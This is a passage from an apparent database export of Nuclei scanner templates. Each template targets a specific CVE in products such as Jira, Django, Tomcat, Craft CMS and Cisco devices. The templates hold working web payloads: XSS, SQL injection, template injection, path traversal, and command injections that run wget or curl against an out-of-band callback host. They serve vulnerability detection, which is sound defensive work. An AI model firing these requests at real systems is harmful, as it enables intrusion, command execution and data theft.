4a0a0047304502206d1b411ea76e89ae1bbd022c4ab57bac51f3fa12b871736779e3d1a35fd883c0022100a71b8922e865146caede677ee0e73b855ba1dad6aceefa4f667aaea98db2e147:922c64590222798bb761d5b6d8e72950", "hash": "5e3c844c1d33a038b2166b5d07057f27", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308250" }, "name": "CVE-2020-9344.yaml", "content": "id: CVE-2020-9344\n\ninfo:\n name: Jira Subversion ALM for Enterprise <8.8.2 - Cross-Site Scripting\n author: madrobot\n severity: medium\n description: Jira Subversion ALM for Enterprise before 8.8.2 contains a cross-site scripting vulnerability at multiple locations.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to potential data theft or unauthorized actions.\n remediation: |\n Upgrade Jira Subversion ALM for Enterprise to version 8.8.2 or later to mitigate this vulnerability.\n reference:\n - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-9344\n - https://kintosoft.atlassian.net/wiki/spaces/SVNALM/pages/753565697/Security+Bulletin\n - https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2020-007.txt\n - https://nvd.nist.gov/vuln/detail/CVE-2020-13483\n - https://github.com/merlinepedra/nuclei-templates\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2020-9344\n cwe-id: CWE-79\n epss-score: 0.00205\n epss-percentile: 0.5782\n cpe: cpe:2.3:a:atlassian:subversion_application_lifecycle_management:*:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 5\n vendor: atlassian\n product: subversion_application_lifecycle_management\n shodan-query: http.component:\"Atlassian Jira\"\n tags: cve2020,cve,atlassian,jira,xss\n\nhttp:\n - method: GET\n path:\n - '{{BaseURL}}/plugins/servlet/svnwebclient/changedResource.jsp?url=%22%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E'\n - '{{BaseURL}}/plugins/servlet/svnwebclient/commitGraph.jsp?%27)%3Balert(%22XSS'\n - '{{BaseURL}}/plugins/servlet/svnwebclient/commitGraph.jsp?url=%22%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E'\n - '{{BaseURL}}/plugins/servlet/svnwebclient/error.jsp?errormessage=%27%22%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E&description=test'\n - '{{BaseURL}}/plugins/servlet/svnwebclient/statsItem.jsp?url=%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E'\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"\"\n - \"jira\"\n - \"subversion\"\n condition: and\n case-insensitive: true\n\n - type: word\n part: header\n words:\n - \"text/html\"\n\n - type: status\n status:\n - 200\n# digest: 4a0a00473045022100f1f8769608644c41386a233cb78ccae42d519ed0ec714381e3823a863f658ed602201ec7768a3888515d76ca4ff5c22cc3b1321f45fb03c25603ed94f79898b132b0:922c64590222798bb761d5b6d8e72950", "hash": "5bcdbd1a7ba34f6ae151fcde60ba9d94", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308251" }, "name": "CVE-2020-9376.yaml", "content": "id: CVE-2020-9376\n\ninfo:\n name: D-Link DIR-610 Devices - Information Disclosure\n author: whynotke\n severity: high\n description: |\n D-Link DIR-610 devices allow information disclosure via SERVICES=DEVICE.ACCOUNT%0AAUTHORIZED_GROUP=1 to getcfg.php.\n NOTE: This vulnerability only affects products that are no longer supported by the maintainer.\n impact: |\n An attacker can gain sensitive information from the device, leading to potential unauthorized access or further attacks.\n remediation: |\n Apply the latest firmware update provided by D-Link to fix the vulnerability.\n reference:\n - https://gist.github.com/GouveaHeitor/dcbb67b301cc45adc00f8a6a2a0a590f\n - https://supportannouncement.us.dlink.com/announcement/publication.aspx?name=SAP10182\n - https://www.dlink.com.br/produto/dir-610/\n - https://nvd.nist.gov/vuln/detail/CVE-2020-9376\n - https://github.com/Z0fhack/Goby_POC\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\n cvss-score: 7.5\n cve-id: CVE-2020-9376\n cwe-id: CWE-74\n epss-score: 0.96966\n epss-percentile: 0.99713\n cpe: cpe:2.3:o:dlink:dir-610_firmware:-:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: dlink\n product: dir-610_firmware\n tags: cve,cve2020,dlink,disclosure,router\n\nhttp:\n - method: POST\n path:\n - \"{{BaseURL}}/getcfg.php\"\n\n body: SERVICES=DEVICE.ACCOUNT%0aAUTHORIZED_GROUP=1\n\n headers:\n Content-Type: application/x-www-form-urlencoded\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"Admin\"\n - \"\"\n - \"\"\n condition: and\n\n - type: status\n status:\n - 200\n# digest: 4a0a00473045022100e98012a37e1c7449138264fa67d0e0279ae5c6f631e4da99cd419bfc34ce7c0e02204622d06279cc4f997a1f316f033a87f60a7bb8f2219b1b24f27692ca69ed8092:922c64590222798bb761d5b6d8e72950", "hash": "eb93f706bc6cef0c859b598716336e1e", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308252" }, "name": "CVE-2020-9402.yaml", "content": "id: CVE-2020-9402\n\ninfo:\n name: Django SQL Injection\n author: geeknik\n severity: high\n description: Django 1.11 before 1.11.29, 2.2 before 2.2.11, and 3.0 before 3.0.4 allow SQL injection if untrusted data is used as a tolerance parameter in GIS functions and aggregates on Oracle. By passing a suitably crafted tolerance to GIS functions and aggregates on Oracle, it is possible to break character escaping and inject malicious SQL.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation.\n remediation: Upgrade to the latest version.\n reference:\n - https://www.debian.org/security/2020/dsa-4705\n - https://github.com/vulhub/vulhub/tree/master/django/CVE-2020-9402\n - https://docs.djangoproject.com/en/3.0/releases/security/\n - https://nvd.nist.gov/vuln/detail/CVE-2020-9402\n - https://groups.google.com/forum/#!topic/django-announce/fLUh_pOaKrY\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 8.8\n cve-id: CVE-2020-9402\n cwe-id: CWE-89\n epss-score: 0.14117\n epss-percentile: 0.95552\n cpe: cpe:2.3:a:djangoproject:django:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: djangoproject\n product: django\n tags: cve,cve2020,django,sqli,vulhub,djangoproject\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/?q=20)%20%3D%201%20OR%20(select%20utl_inaddr.get_host_name((SELECT%20version%20FROM%20v%24instance))%20from%20dual)%20is%20null%20%20OR%20(1%2B1\"\n\n matchers:\n - type: word\n words:\n - \"DatabaseError at\"\n - \"ORA-29257:\"\n - \"ORA-06512:\"\n - \"Request Method:\"\n condition: and\n# digest: 4a0a00473045022100ccf3113bbf0b9acac23cb361dc7f354995e653943ccb6f448a8fb6a883c4071302205350ce4634728a65fbf460c2adf249a31f93c769451b8969561f2c1d50f9d980:922c64590222798bb761d5b6d8e72950", "hash": "8f228ab0a1d8d2092bacb53571187543", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308253" }, "name": "CVE-2020-9425.yaml", "content": "id: CVE-2020-9425\n\ninfo:\n name: rConfig <3.9.4 - Sensitive Information Disclosure\n author: madrobot\n severity: high\n description: rConfig prior to version 3.9.4 is susceptible to sensitive information disclosure. An unauthenticated attacker can retrieve saved cleartext credentials via a GET request to settings.php. Because the application does not exit after a redirect is applied, the rest of the page still executes, resulting in the disclosure of cleartext credentials in the response.\n impact: |\n An attacker can exploit this vulnerability to gain access to sensitive information, such as usernames and passwords.\n remediation: |\n Upgrade rConfig to version 3.9.4 or later to fix the vulnerability.\n reference:\n - https://blog.hivint.com/rconfig-3-9-3-unauthenticated-sensitive-information-disclosure-ead4ed88f153\n - https://github.com/rconfig/rconfig/commit/20f4e3d87e84663d922b937842fddd9af1b68dd9\n - https://nvd.nist.gov/vuln/detail/CVE-2020-9425\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\n cvss-score: 7.5\n cve-id: CVE-2020-9425\n cwe-id: CWE-670\n epss-score: 0.01611\n epss-percentile: 0.86058\n cpe: cpe:2.3:a:rconfig:rconfig:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: rconfig\n product: rconfig\n tags: cve,cve2020,rconfig.exposure,rconfig\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/settings.php\"\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"defaultNodeUsername\"\n - \"defaultNodePassword\"\n condition: and\n\n - type: status\n status:\n - 200\n# digest: 4b0a0048304602210097bd62e865ddc5a66964df63555a520511d79d0a43a5efbe2ec58a057de20434022100b3494688001927c623591a7583963320e5605ace9d2a8dc63c05f693ac3e9297:922c64590222798bb761d5b6d8e72950", "hash": "58c52cafa7a80144da75ba0341b1e4c1", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308254" }, "name": "CVE-2020-9483.yaml", "content": "id: CVE-2020-9483\n\ninfo:\n name: SkyWalking SQLI\n author: pikpikcu\n severity: high\n description: |\n When using H2/MySQL/TiDB as Apache SkyWalking storage and a metadata query through GraphQL protocol, there is a SQL injection vulnerability which allows access to unexpected data. Apache SkyWalking 6.0.0 to 6.6.0, 7.0.0 H2/MySQL/TiDB storage implementations don't use the appropriate way to set SQL parameters.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation.\n remediation: |\n Apply the latest security patches or updates provided by the SkyWalking project to fix the SQL injection vulnerability.\n reference:\n - https://github.com/apache/skywalking/pull/4639\n - https://nvd.nist.gov/vuln/detail/CVE-2020-9483\n - https://github.com/Elsfa7-110/kenzer-templates\n - https://github.com/developer3000S/PoC-in-GitHub\n - https://github.com/pen4uin/awesome-vulnerability-research\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\n cvss-score: 7.5\n cve-id: CVE-2020-9483\n cwe-id: CWE-89\n epss-score: 0.0522\n epss-percentile: 0.92833\n cpe: cpe:2.3:a:apache:skywalking:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: apache\n product: skywalking\n tags: cve,cve2020,sqli,skywalking,apache\n\nhttp:\n - method: POST\n path:\n - \"{{BaseURL}}/graphql\"\n\n body: |\n {\"query\":\"query SQLi($d: Duration!){globalP99:getLinearIntValues(metric: {name:\\\"all_p99\\\",id:\\\"') UNION SELECT 1,CONCAT('~','9999999999','~')-- \\\",}, duration: $d){values{value}}}\",\"variables\":{\"d\":{\"start\":\"2021-11-11\",\"end\":\"2021-11-12\",\"step\":\"DAY\"}}}\n\n headers:\n Content-Type: application/json\n\n matchers-condition: and\n matchers:\n - type: word\n part: header\n words:\n - \"Content-Type: application/json\"\n\n - type: word\n part: body\n words:\n - \"UNION SELECT 1,CONCAT('~','9999999999','~')--\"\n - 'Exception while fetching data'\n condition: and\n\n - type: status\n status:\n - 200\n# digest: 4a0a0047304502201024425cbbd282e119ced24601c58cf9f2b99756be728bcc7f6f876917cf5909022100e43816008bda23d059ebc830cb5e9db84a99234636b245f09230bc663d39746f:922c64590222798bb761d5b6d8e72950", "hash": "05dad0afd5b72b950970b7936aa303af", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308255" }, "name": "CVE-2020-9484.yaml", "content": "id: CVE-2020-9484\n\ninfo:\n name: Apache Tomcat Remote Command Execution\n author: dwisiswant0\n severity: high\n description: |\n When using Apache Tomcat versions 10.0.0-M1 to 10.0.0-M4, 9.0.0.M1 to 9.0.34, 8.5.0 to 8.5.54 and 7.0.0 to 7.0.103 if\n a) an attacker is able to control the contents and name of a file on the server; and\n b) the server is configured to use the PersistenceManager with a FileStore; and\n c) the PersistenceManager is configured with sessionAttributeValueClassNameFilter=\"null\" (the default unless a SecurityManager is used) or a sufficiently lax filter to allow the attacker provided object to be deserialized; and\n d) the attacker knows the relative file path from the storage location used by FileStore to the file the attacker has control over; then, using a specifically crafted request, the attacker will be able to trigger remote code execution via deserialization of the file under their control.\n Note that all of conditions a) to d) must be true for the attack to succeed.\n impact: |\n Successful exploitation of this vulnerability can lead to remote code execution, allowing attackers to execute arbitrary commands on the affected system.\n remediation: |\n Apply the latest security patches provided by Apache to mitigate this vulnerability.\n reference:\n - http://packetstormsecurity.com/files/157924/Apache-Tomcat-CVE-2020-9484-Proof-Of-Concept.html\n - https://nvd.nist.gov/vuln/detail/CVE-2020-9484\n - https://lists.apache.org/thread.html/r77eae567ed829da9012cadb29af17f2df8fa23bf66faf88229857bb1%40%3Cannounce.tomcat.apache.org%3E\n - https://lists.apache.org/thread.html/rf70f53af27e04869bdac18b1fc14a3ee529e59eb12292c8791a77926@%3Cusers.tomcat.apache.org%3E\n - http://lists.opensuse.org/opensuse-security-announce/2020-05/msg00057.html\n classification:\n cvss-metrics: CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 7\n cve-id: CVE-2020-9484\n cwe-id: CWE-502\n epss-score: 0.92769\n epss-percentile: 0.98967\n cpe: cpe:2.3:a:apache:tomcat:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: apache\n product: tomcat\n shodan-query: title:\"Apache Tomcat\"\n tags: cve2020,cve,rce,packetstorm,apache,tomcat\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/index.jsp\"\n\n headers:\n Cookie: \"JSESSIONID=../../../../../usr/local/tomcat/groovy\"\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"Exception\"\n - \"ObjectInputStream\"\n - \"PersistentManagerBase\"\n condition: and\n\n - type: status\n status:\n - 500\n# digest: 4a0a0047304502200c88732807072e4a6338643df18beacf7f55f33b12f14afd156a824a3b356fbd022100cf87ad99a473933a67e31655bbb149fa818e982f9a341cd2d84c75cea140afaf:922c64590222798bb761d5b6d8e72950", "hash": "ba71cd9536460f9790aa87adedf3e7a9", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308256" }, "name": "CVE-2020-9496.yaml", "content": "id: CVE-2020-9496\n\ninfo:\n name: Apache OFBiz 17.12.03 - Cross-Site Scripting\n author: dwisiswant0\n severity: medium\n description: Apache OFBiz 17.12.03 contains cross-site scripting and unsafe deserialization vulnerabilities via an XML-RPC request.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information.\n remediation: |\n Apply the latest security patches or upgrade to a non-vulnerable version of Apache OFBiz.\n reference:\n - http://packetstormsecurity.com/files/158887/Apache-OFBiz-XML-RPC-Java-Deserialization.html\n - http://packetstormsecurity.com/files/161769/Apache-OFBiz-XML-RPC-Java-Deserialization.html\n - https://securitylab.github.com/advisories/GHSL-2020-069-apache_ofbiz\n - https://s.apache.org/l0994\n - https://nvd.nist.gov/vuln/detail/CVE-2020-9496\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2020-9496\n cwe-id: CWE-502\n epss-score: 0.89561\n epss-percentile: 0.98689\n cpe: cpe:2.3:a:apache:ofbiz:17.12.03:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: apache\n product: ofbiz\n tags: cve,cve2020,ofbiz,packetstorm,apache,java\n\nhttp:\n - raw:\n - |\n POST /webtools/control/xmlrpc HTTP/1.1\n Host: {{Hostname}}\n Origin: http://{{Hostname}}\n Content-Type: application/xml\n\n ProjectDiscoverydwisiswant0\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"faultString\"\n - \"No such service [ProjectDiscovery]\"\n - \"methodResponse\"\n condition: and\n\n - type: word\n part: header\n words:\n - \"Content-Type: text/xml\"\n\n - type: status\n status:\n - 200\n# digest: 4a0a0047304502206995e8b04712ff12a7cc6259c6023a6f173a130e97bdbe8eeedb0a48258d92ec02210088b782bfd12b1d37ead9da796f4c265fadd35a83d0fdab5cbc2a3352abb19f49:922c64590222798bb761d5b6d8e72950", "hash": "fad757b2cea3638d0b49c6e746424a27", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308257" }, "name": "CVE-2020-9757.yaml", "content": "id: CVE-2020-9757\n\ninfo:\n name: Craft CMS < 3.3.0 - Server-Side Template Injection\n author: dwisiswant0\n severity: critical\n description: Craft CMS before 3.3.0 is susceptible to server-side template injection via the SEOmatic component that could lead to remote code execution via malformed data submitted to the metacontainers controller.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the server.\n remediation: |\n Upgrade Craft CMS to version 3.3.0 or higher to mitigate this vulnerability.\n reference:\n - https://github.com/nystudio107/craft-seomatic/blob/v3/CHANGELOG.md\n - https://github.com/giany/CVE/blob/master/CVE-2020-9757.txt\n - https://github.com/nystudio107/craft-seomatic/commit/65ab659cb6c914c7ad671af1e417c0da2431f79b\n - https://github.com/nystudio107/craft-seomatic/commit/a1c2cad7e126132d2442ec8ec8e9ab43df02cc0f\n - https://nvd.nist.gov/vuln/detail/CVE-2020-9757\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2020-9757\n cwe-id: CWE-74\n epss-score: 0.96518\n epss-percentile: 0.99576\n cpe: cpe:2.3:a:craftcms:craft_cms:*:*:*:*:*:*:*:*\n metadata:\n max-request: 2\n vendor: craftcms\n product: craft_cms\n tags: cve,cve2020,ssti,craftcms\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/actions/seomatic/meta-container/meta-link-container/?uri={{228*'98'}}\"\n - \"{{BaseURL}}/actions/seomatic/meta-container/all-meta-containers?uri={{228*'98'}}\"\n\n skip-variables-check: true\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"MetaLinkContainer\"\n - \"canonical\"\n - \"22344\"\n condition: and\n\n - type: status\n status:\n - 200\n# digest: 4b0a00483046022100ecfcc24163fa9d5a764dd7f1d6bc59d23a3cb69c7c3ca9bf2b3d0a9f92d38fba022100f48bd5a9fde0ece8cf3a033e1fde317110d9ef706c9a178ab65cf6f5bad96f5a:922c64590222798bb761d5b6d8e72950", "hash": "9a81dc053de58110fca39c2f768f5fc8", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308258" }, "name": "CVE-2021-1472.yaml", "content": "id: CVE-2021-1472\n\ninfo:\n name: Cisco Small Business RV Series - OS Command Injection\n author: gy741\n severity: critical\n description: |\n Cisco Small Business RV Series routers RV16X/RV26X versions 1.0.01.02 and before and RV34X versions 1.0.03.20 and before contain multiple OS command injection vulnerabilities in the web-based management interface. A remote attacker can execute arbitrary OS commands via the sessionid cookie or bypass authentication and upload files on an affected device.\n impact: |\n Successful exploitation of this vulnerability can lead to unauthorized remote code execution, compromising the confidentiality, integrity, and availability of the affected device.\n remediation: |\n Apply the latest security patches or firmware updates provided by Cisco to mitigate this vulnerability.\n reference:\n - https://www.iot-inspector.com/blog/advisory-cisco-rv34x-authentication-bypass-remote-command-execution/\n - https://packetstormsecurity.com/files/162238/Cisco-RV-Authentication-Bypass-Code-Execution.html\n - https://nvd.nist.gov/vuln/detail/CVE-2021-1472\n - https://nvd.nist.gov/vuln/detail/CVE-2021-1473\n - http://seclists.org/fulldisclosure/2021/Apr/39\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2021-1472\n cwe-id: CWE-287,CWE-119\n epss-score: 0.97174\n epss-percentile: 0.99793\n cpe: cpe:2.3:o:cisco:rv160_firmware:*:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 1\n vendor: cisco\n product: rv160_firmware\n shodan-query: http.html:\"Cisco rv340\"\n tags: cve2021,cve,packetstorm,seclists,auth-bypass,injection,cisco,rce,intrusive\n\nhttp:\n - raw:\n - |\n POST /upload HTTP/1.1\n Host: {{Hostname}}\n Cookie: sessionid='`wget http://{{interactsh-url}}`'\n Authorization: QUt6NkpTeTE6dmk4cW8=\n Content-Type: multipart/form-data; boundary=---------------------------392306610282184777655655237536\n\n -----------------------------392306610282184777655655237536\n Content-Disposition: form-data; name=\"option\"\n\n 5NW9Cw1J\n -----------------------------392306610282184777655655237536\n Content-Disposition: form-data; name=\"destination\"\n\n J0I5k131j2Ku\n -----------------------------392306610282184777655655237536\n Content-Disposition: form-data; name=\"file.path\"\n\n EKsmqqg0\n -----------------------------392306610282184777655655237536\n Content-Disposition: form-data; name=\"file\"; filename=\"config.xml\"\n Content-Type: application/xml\n\n qJ57CM9\n -----------------------------392306610282184777655655237536\n Content-Disposition: form-data; name=\"filename\"\n\n JbYXJR74n.xml\n -----------------------------392306610282184777655655237536\n Content-Disposition: form-data; name=\"GXbLINHYkFI\"\n\n configurationFILE://Configuration/config.xmlconfig-running\n -----------------------------392306610282184777655655237536--\n\n matchers-condition: and\n matchers:\n - type: word\n part: interactsh_protocol\n words:\n - http\n\n - type: word\n part: body\n words:\n - '\"jsonrpc\":'\n# digest: 4a0a0047304502207d2afae99f9b9e0f78952b1cccf9209e11e2cab61e200b590312046dcd5acbfd0221009ae723766dfe0df8dd26b8392a3a3c7a690658e170dc65292bdb3dbe49de9ace:922c64590222798bb761d5b6d8e72950", "hash": "345c51ed1302164da6df009299c1e1d7", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308259" }, "name": "CVE-2021-1497.yaml", "content": "id: CVE-2021-1497\n\ninfo:\n name: Cisco HyperFlex HX Data Platform - Remote Command Execution\n author: gy741\n severity: critical\n description: Cisco HyperFlex HX contains multiple vulnerabilities in the web-based management interface that could allow an unauthenticated, remote attacker to perform command injection attacks against an affected device.\n remediation: |\n Apply the necessary security patches or updates provided by Cisco to mitigate this vulnerability.\n reference:\n - https://swarm.ptsecurity.com/cisco-hyperflex-how-we-got-rce-through-login-form-and-other-findings/\n - https://nvd.nist.gov/vuln/detail/CVE-2021-1497\n - https://packetstormsecurity.com/files/162976/Cisco-HyperFlex-HX-Data-Platform-Command-Execution.html\n - https://twitter.com/Unit42_Intel/status/1402655493735206915\n - https://twitter.com/ptswarm/status/1390300625129201664\n - https://www.thezdi.com/blog/2021/6/23/cve-2021-1497-cisco-hyperflex-hx-auth-handling-remote-command-execution\n - https://github.com/EdgeSecurityTeam/Vulnerability/blob/c0af411de9adb82826303c5b05a0d766fb553f28/Cisco%20HyperFlex%20HX%20%E5%91%BD%E4%BB%A4%E6%B3%A8%E5%85%A5%EF%BC%88CVE-2021-1497-CVE-2021-1498%EF%BC%89.md\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2021-1497\n cwe-id: CWE-78\n epss-score: 0.97512\n epss-percentile: 0.99982\n cpe: cpe:2.3:o:cisco:hyperflex_hx_data_platform:4.0\\(2a\\):*:*:*:*:*:*:*\n metadata:\n max-request: 2\n vendor: cisco\n product: hyperflex_hx_data_platform\n tags: cve,cve2021,cisco,rce,oast,kev,packetstorm\nvariables:\n cmd: 'curl http://{{interactsh-url}} -H \\\"User-Agent: {{useragent}}\\\"'\n payload: '123\",\"\"$6$$)); import os;os.system(\"{{cmd}}\");print(crypt.crypt(\"'\n useragent: '{{rand_base(6)}}'\n\nhttp:\n - raw:\n - |\n POST /auth/change HTTP/1.1\n Host: {{Hostname}}\n Accept: */*\n Content-Type: application/x-www-form-urlencoded\n\n username=root&password={{url_encode(payload)}}\n - |\n POST /auth HTTP/1.1\n Host: {{Hostname}}\n Accept: */*\n Content-Type: application/x-www-form-urlencoded\n\n username=root&password={{url_encode(payload)}}\n\n matchers-condition: and\n matchers:\n - type: word\n part: interactsh_protocol # Confirms the HTTP Interaction\n words:\n - \"http\"\n\n - type: word\n part: interactsh_request\n words:\n - \"User-Agent: {{useragent}}\"\n# digest: 4a0a0047304502205bf03c53ef9c3e589285c61ece0c3f8d9ba380374319f9d6e77009202da15e95022100b2cc64f119929489719747070a86407765284ea6775591bd2dc826e977a54646:922c64590222798bb761d5b6d8e72950", "hash": "7a72affb7987a339b0e42d8498ac0f10", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf30825a" }, "name": "CVE-2021-1498.yaml", "content": "id: CVE-2021-1498\n\ninfo:\n name: Cisco HyperFlex HX Data Platform - Remote Command Execution\n author: gy741\n severity: critical\n description: Cisco HyperFlex HX contains multiple vulnerabilities in the web-based management interface that could allow an unauthenticated, remote attacker to perform command injection attacks against an affected device.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary commands on the affected system.\n remediation: |\n Apply the necessary security patches or updates provided by Cisco to mitigate this vulnerability.\n reference:\n - https://swarm.ptsecurity.com/cisco-hyperflex-how-we-got-rce-through-login-form-and-other-findings/\n - https://nvd.nist.gov/vuln/detail/CVE-2021-1498\n - https://packetstormsecurity.com/files/162976/Cisco-HyperFlex-HX-Data-Platform-Command-Execution.html\n - https://twitter.com/Unit42_Intel/status/1402655493735206915\n - https://twitter.com/ptswarm/status/1390300625129201664\n - https://www.thezdi.com/blog/2021/6/23/cve-2021-1497-cisco-hyperflex-hx-auth-handling-remote-command-execution\n - https://github.com/EdgeSecurityTeam/Vulnerability/blob/c0af411de9adb82826303c5b05a0d766fb553f28/Cisco%20HyperFlex%20HX%20%E5%91%BD%E4%BB%A4%E6%B3%A8%E5%85%A5%EF%BC%88CVE-2021-1497-CVE-2021-1498%EF%BC%89.md\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2021-1498\n cwe-id: CWE-78\n epss-score: 0.97512\n epss-percentile: 0.99982\n cpe: cpe:2.3:o:cisco:hyperflex_hx_data_platform:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: cisco\n product: hyperflex_hx_data_platform\n tags: cve,cve2021,kev,packetstorm,cisco,rce,oast,mirai\n\nhttp:\n - raw:\n - |\n POST /storfs-asup HTTP/1.1\n Host: {{Hostname}}\n Accept: */*\n Content-Type: application/x-www-form-urlencoded\n\n action=&token=`wget http://{{interactsh-url}}`&mode=`wget http://{{interactsh-url}}`\n\n matchers-condition: and\n matchers:\n - type: word\n part: interactsh_protocol # Confirms the HTTP Interaction\n words:\n - \"http\"\n\n - type: status\n status:\n - 200\n# digest: 490a0046304402205928b479b0e61672c4d2b20bdeae75d2dba2d325c94c7154aa53b8e88dfc65f202207c82f73333f8276f8f5eb140990b1b92acc361e69b4e1dd8fd134ce4a84b064e:922c64590222798bb761d5b6d8e72950", "hash": "1615044d26883c50aa0c8f8af273be50", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf30825b" }, "name": "CVE-2021-1499.yaml", "content": "id: CVE-2021-1499\n\ninfo:\n name: Cisco HyperFlex HX Data Platform - Arbitrary File Upload\n author: gy741\n severity: medium\n description: Cisco HyperFlex HX Data Platform contains an arbitrary file upload vulnerability in the web-based management interface. An attacker can send a specific HTTP request to an affected device, thus enabling upload of files to the affected device with the permissions of the tomcat8 user.\n impact: |\n Allows an attacker to upload and execute arbitrary files on the target system\n remediation: |\n Apply the necessary security patches or updates provided by Cisco\n reference:\n - https://swarm.ptsecurity.com/cisco-hyperflex-how-we-got-rce-through-login-form-and-other-findings/\n - https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-hyperflex-upload-KtCK8Ugz\n - http://packetstormsecurity.com/files/163203/Cisco-HyperFlex-HX-Data-Platform-File-Upload-Remote-Code-Execution.html\n - https://nvd.nist.gov/vuln/detail/CVE-2021-1499\n - https://github.com/Z0fhack/Goby_POC\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N\n cvss-score: 5.3\n cve-id: CVE-2021-1499\n cwe-id: CWE-306\n epss-score: 0.9652\n epss-percentile: 0.99578\n cpe: cpe:2.3:o:cisco:hyperflex_hx_data_platform:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: cisco\n product: hyperflex_hx_data_platform\n tags: cve2021,cve,fileupload,intrusive,packetstorm,cisco\n\nhttp:\n - raw:\n - |\n POST /upload HTTP/1.1\n Host: {{Hostname}}\n Accept: */*\n Accept-Encoding: gzip, deflate\n Content-Type: multipart/form-data; boundary=---------------------------253855577425106594691130420583\n Origin: {{RootURL}}\n Referer: {{RootURL}}\n\n -----------------------------253855577425106594691130420583\n Content-Disposition: form-data; name=\"file\"; filename=\"../../../../../tmp/passwd9\"\n Content-Type: application/json\n\n MyPasswdNewData->/api/tomcat\n\n -----------------------------253855577425106594691130420583--\n\n matchers-condition: and\n matchers:\n - type: word\n words:\n - '{\"result\":'\n - '\"filename:'\n - '/tmp/passwd9'\n condition: and\n\n - type: word\n part: header\n words:\n - \"application/json\"\n\n - type: status\n status:\n - 200\n# digest: 